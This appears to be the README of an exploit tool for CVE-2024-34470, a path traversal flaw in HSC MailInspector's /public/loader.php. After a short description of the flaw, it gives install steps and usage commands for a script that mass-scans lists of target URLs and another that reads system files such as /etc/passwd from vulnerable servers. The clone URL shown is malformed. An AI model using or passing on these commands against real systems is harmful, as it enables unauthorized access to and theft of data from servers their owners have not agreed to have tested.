## https://sploitus.com/exploit?id=CE2C9321-507E-5995-8D17-AE1556D7139A
# HSC MailInspector - CVE-2024-34470
___
A critical vulnerability has been found in HSC Mailinspector up to version 5.2.18. This vulnerability affects an unknown functionality of the file /public/loader.php. Manipulating the 'path' argument with an unknown input leads to a path traversal vulnerability. According to CWE, this issue is classified as CWE-22. The product uses external input to construct a pathname intended to identify a file or directory located beneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location outside of the restricted directory. This affects confidentiality, integrity, and availability.
___
## Installation
**Clone the repository:**
```bash
git clone https://CVE-2024-34470.git
cd CVE-2024-34470
```
**Install the dependencies**
Make sure you have Python and pip installed. Then, run:
```bash
pip install -r requirements.txt
```
- This will install all the necessary dependencies to run the script.
___
## Use
### Script Description
To perform a search for multiple targets using a text file, use the script **Massive_CVE-2024-34470.py**
```powershell
$ python3 Massive_CVE-2024-34470.py urls.txt urls_vulnerable.txt 2>/dev/null
```
The format in which the _urls.txt_ file should be is as follows:
```powershell
https://10.18.97.2
http://domain.com
https://192.8.7.2:4443
```
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_1.png)
___
Once the vulnerable targets have been identified, we use the script called **CVE-2024-34470.py** to exploit and display the content specified through the terminal.
```python
# Read file content passwd
$ python CVE-2024-34470.py http://example.com /etc/passwd 2>/dev/null
# Read file content hosts
$ python CVE-2024-34470.py http://example.com /etc/hosts
```
![[screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_2.png)